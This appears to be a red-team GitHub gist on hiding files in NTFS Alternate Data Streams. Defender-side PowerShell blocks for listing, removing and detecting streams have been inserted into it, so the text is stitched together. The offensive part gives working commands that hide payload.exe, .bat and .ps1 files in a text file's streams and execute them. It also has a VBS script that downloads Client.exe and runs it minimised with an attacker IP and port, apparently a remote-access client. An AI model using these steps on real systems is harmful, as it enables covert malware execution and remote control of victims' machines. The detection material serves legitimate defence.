Gist: r00t-3xp10it/e55c196e7ac9e5fc1eb8ea6a2feb0d65
meterpeter updates
meterpeter new updates
Alternate data streams (ADS)
What are Alternate Data Streams?
Alternate Data Streams (ADS) have been around since the introduction of Windows NTFS. They were designed to provide compatibility with the old Hierarchical File System (HFS) from Mac, which uses something called resource forks. Basically, ADS can be used to hide the presence of a secret or malicious file inside the file record of an innocent file. That is, when Windows shows you a file, say "readme.txt", the metadata that tells your system where to get "readme.txt" may also contain the data of "EvilSpyware.exe". Thus, malicious files may be on your system and you cannot see them using normal means: Explorer and a plain dir listing only show the default (unnamed) stream of each file.
How to see Alternate Data Streams records in CLI?
dir /r
dir /r lists each named stream next to its owning file as file:stream:$DATA, together with the stream size.
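As an added defender-side example (not part of the gist), the same enumeration in PowerShell: Get-Item with -Stream * returns one object per stream of a file, so filtering out the unnamed :$DATA stream and the browser-written Zone.Identifier leaves exactly the named streams that the proof-of-concept below creates. The function names Get-HiddenStream and Remove-HiddenStream and the $Path parameter are my own; the cmdlets and their -Stream parameter are standard PowerShell 3.0+.

```powershell
# Added example, not from the gist: enumerate and remove named NTFS streams.
# Requires PowerShell 3.0+ on Windows (the -Stream parameter is NTFS-only).

function Get-HiddenStream {
    [CmdletBinding()]
    param(
        # Directory to scan (hypothetical parameter name chosen for this example)
        [Parameter(Mandatory)] [string] $Path,
        # :$DATA is the default stream every file has; Zone.Identifier is the
        # Mark-of-the-Web written by browsers and mail clients and is normally benign.
        [string[]] $IgnoreStream = @(':$DATA', 'Zone.Identifier')
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # -Stream * yields one AlternateStreamData object per stream of the file
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
        } |
        Where-Object { $IgnoreStream -notcontains $_.Stream } |
        Select-Object FileName, Stream, Length
}

function Remove-HiddenStream {
    # Deletes a single named stream and leaves the file's default content intact.
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)] [string] $FileName,
        [Parameter(Mandatory)] [string] $Stream
    )
    if ($PSCmdlet.ShouldProcess("${FileName}:${Stream}", 'Remove alternate data stream')) {
        Remove-Item -LiteralPath $FileName -Stream $Stream
    }
}

# Usage: list every named stream under the Desktop, then dry-run a removal.
Get-HiddenStream -Path "$env:USERPROFILE\Desktop" | Format-Table -AutoSize
Remove-HiddenStream -FileName "$env:USERPROFILE\Desktop\SSAredTeam.txt" -Stream 'kali-linux.jpg' -WhatIf
```

Run the removal without -WhatIf once the listing confirms the stream is unexpected. Note that copying a file to a FAT or exFAT volume, or through most archive formats, silently drops named streams, which is why a stream inventory taken on the NTFS volume itself is the reliable check.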
Proof-Of-Concept
Hide a jpg image in a text file
- Create one text file in which the jpg image will be embedded
echo test if it works > SSAredTeam.txt
- Append the jpg image to the text file as a named stream
type kali-linux.jpg > SSAredTeam.txt:kali-linux.jpg
- Delete the original kali-linux.jpg image
del kali-linux.jpg
- See the ADS
dir /r
- Open the kali-linux.jpg image straight from the ADS
mspaint.exe C:\Users\pedro\Desktop\SSAredTeam.txt:kali-linux.jpg
Hide an mp3 in a text file
- Create one text file in which the mp3 file will be embedded
echo test if it works > SSAredTeam.txt
- Append the mp3 file to the text file as a named stream
type mysong.mp3 > SSAredTeam.txt:mysong.mp3
- Delete the original mysong.mp3
del mysong.mp3
- See the ADS
dir /r
- Play mysong.mp3 straight from the ADS
wmplayer.exe C:\Users\pedro\Desktop\SSAredTeam.txt:mysong.mp3
Hide an exe in a text file
- Create one text file in which the exe file will be embedded
echo test if it works > SSAredTeam.txt
- Append the exe file to the text file as a named stream
type payload.exe > SSAredTeam.txt:payload.exe
- Delete the original payload.exe
del payload.exe
- See the ADS
dir /r
- Execute payload.exe (ADS)
wmic.exe process call create "C:\Users\pedro\Desktop\SSAredTeam.txt:payload.exe"
- Execute payload.bat stored in an Alternate Data Stream (ADS)
cmd.exe - < SSAredTeam.txt:payload.bat
- Execute payload.ps1 stored in an Alternate Data Stream (ADS)
powershell .\SSAredTeam.txt:payload.ps1
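Added detection example, not from the gist: every execution command in the proof-of-concept above names the stream as file:stream on the command line, which is exactly what a process-creation record (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled) preserves. The function below, and the sample command lines it is run over, are constructed by me for illustration; the function name Test-AdsCommandLine is hypothetical.

```powershell
# Added example, not from the gist: flag command lines that reference an NTFS
# alternate data stream. Feed it the CommandLine field of process-creation events.

function Test-AdsCommandLine {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)] [string] $CommandLine)
    process {
        # A stream reference is <name>.<ext>:<stream>. The character classes exclude
        # whitespace, quotes, backslash and colon, so a drive letter (C:\) never
        # matches because it has no ".ext" before its colon, while the last path
        # component of C:\...\SSAredTeam.txt:payload.exe does.
        $pattern = '[^\s"''\\:]+\.[A-Za-z0-9]+:[^\s"''\\:/]+'
        $hits = @([regex]::Matches($CommandLine, $pattern) | ForEach-Object { $_.Value })
        [pscustomobject]@{
            Suspicious  = ($hits.Count -gt 0)
            StreamRefs  = $hits -join ', '
            CommandLine = $CommandLine
        }
    }
}

# Constructed sample command lines (not real telemetry). The first three mirror the
# gist's own launch commands; the last two are benign and must not be flagged.
$samples = @(
    'wmic.exe process call create "C:\Users\pedro\Desktop\SSAredTeam.txt:payload.exe"',
    'cmd.exe - < SSAredTeam.txt:payload.bat',
    'powershell .\SSAredTeam.txt:payload.ps1',
    'C:\Windows\System32\notepad.exe C:\Users\pedro\Desktop\readme.txt',
    'powershell -c Invoke-WebRequest https://example.invalid/file.zip'
)

$samples | Test-AdsCommandLine | Where-Object Suspicious | Format-Table -AutoSize
```

Expect the first three samples to be reported with StreamRefs of SSAredTeam.txt:payload.exe, SSAredTeam.txt:payload.bat and SSAredTeam.txt:payload.ps1, and the two benign lines to be dropped by the Where-Object filter. A legitimate hit on file.txt:Zone.Identifier (for instance from Unblock-File) is still an ADS reference, so treat the output as a triage queue rather than a verdict, and pair it with the stream inventory from the section above.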
Download files using VBS
' Set your url settings and the saving options
strFileURL = "https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe"
strHDLocation = "C:\Users\pedro\Desktop\Client.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start
    Set objFSO = Createobject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If
Set objXMLHTTP = Nothing
x = MsgBox("File Successfully Downloaded" & vbCrLf & "Storage: C:\Users\pedro\Desktop\Client.exe", 64, "VBS Downloader")
CreateObject("WScript.Shell").Exec "cmd /R start /min Client.exe ip=192.168.1.73 port=666"
One-liner download
Download with VBS API